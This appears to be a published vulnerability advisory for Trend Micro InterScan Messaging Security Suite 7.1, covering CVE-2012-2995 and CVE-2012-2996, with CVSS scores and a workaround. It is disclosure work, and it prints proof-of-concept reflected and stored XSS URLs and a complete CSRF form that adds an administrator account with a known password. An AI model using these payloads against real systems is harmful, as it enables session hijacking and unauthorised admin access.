CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
EPSS
Percentile
75.4%
Trend Micro InterScan Messaging Security Suite Version 7.1-Build_Win32_1394 has been reported to be susceptible to cross-site scripting and cross-site request forgery vulnerabilities.
Trend Micro InterScan Messaging Security Suite is susceptible to cross-site scripting (CWE-79) and cross-site request forgery (CWE-352) vulnerabilities.
**Cross-site scripting (**CVE-2012-2995) (CWE-79)
Persistent/Stored XSS
hxxps://127.0.0.1:8445/addRuleAttrWrsApproveUrl.imss?wrsApprovedURL=xssxss``"><script>alert('XSS')</script>
Non-persistent/Reflected XSS
hxxps://127.0.0.1/initUpdSchPage.imss?src=``"><script>alert('XSS')</script>
**Cross-site request forger****y (**CVE-2012-2996) (CWE-352)
CSRF add admin privilege account
<html> <body> <form action="hxxps://127.0.0.1:8445/saveAccountSubTab.imss" method="POST"> <input type="hidden" name="enabled" value="on" /> <input type="hidden" name="authMethod" value="1" /> <input type="hidden" name="name" value="quorra" /> <input type="hidden" name="password" value="quorra.123" /> <input type="hidden" name="confirmPwd" value="quorra.123" /> <input type="hidden" name="tabAction" value="saveAuth" /> <input type="hidden" name="gotoTab" value="saveAll" /> <input type="submit" value="CSRF" /> </form> </body> </html>
An unauthenticated attacker may be able to execute arbitrary script in the context of a logged in user’s session.
We are currently unaware of a practical solution to this problem. Please consider the following workarounds.
Restrict access
As a general good security practice, only allow connections from trusted hosts and networks. Restricting access would prevent an attacker from accessing the InterScan Messaging Security Suite using stolen credentials from a blocked network location.
471364
Filter by status: All Affected Not Affected Unknown
Filter by content: __ Additional information available
__ Sort by: Status Alphabetical
Expand all
Javascript is disabled. Click here to view vendors.
Notified: August 10, 2012 Updated: September 12, 2012
Affected
We have not received a statement from the vendor.
We are not aware of further vendor information regarding this vulnerability.
Group | Score | Vector |
---|---|---|
Base | 6.8 | AV:N/AC:M/Au:N/C:P/I:P/A:P |
Temporal | 5.5 | E:POC/RL:U/RC:UC |
Environmental | 1.4 | CDP:ND/TD:L/CR:ND/IR:ND/AR:ND |
Thanks to Tom Gregory for reporting this vulnerability.
This document was written by Jared Allar.
CVE IDs: | CVE-2012-2995, CVE-2012-2996 |
---|---|
Date Public: | 2012-09-13 Date First Published: |